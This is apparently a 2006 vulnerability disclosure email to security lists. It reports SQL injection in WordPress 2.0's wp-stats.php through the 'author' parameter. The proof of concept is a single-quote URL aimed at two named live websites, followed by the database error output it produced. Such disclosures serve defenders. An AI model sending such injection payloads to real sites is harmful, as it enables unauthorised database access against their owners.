From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Sun, 15 Jan 2006 15:41:33 -0500
Subject: [OSVDB Mods] Wordpress 2.0 Sql Injection (Wp-Stats)

Wordpress 2.0 Sql Injection (Wp-Stats)

Vendor URL: http://wordpress.org/

PoC:

http://jdwright.us/wp-stats.php?author='

http://www.vuotavita.com/wp-stats.php?author='


Result:

WordPress database error: [You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for
the right syntax to use near ''''' at line 1]
SELECT COUNT(comment_ID) FROM wp_comments WHERE comment_author='''

WordPress database error: [You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for
the right syntax to use near '1' AND post_date < '2006-01-15 15:05:51'
AND (post_status = 'pu]
SELECT wp_posts.ID, comment_author, comment_date, comment_content,
ID, comment_ID, post_date, post_title, post_name FROM wp_comments
INNER JOIN wp_posts ON wp_comments.comment_post_ID = wp_posts.ID
WHERE comment_author = ''' AND comment_approved = '1' AND post_date
< '2006-01-15 15:05:51' AND (post_status = 'publish' OR post_status
= 'static') ORDER BY comment_post_ID DESC, comment_date DESC LIMIT 0, 10


Preddy
RootShell Security Group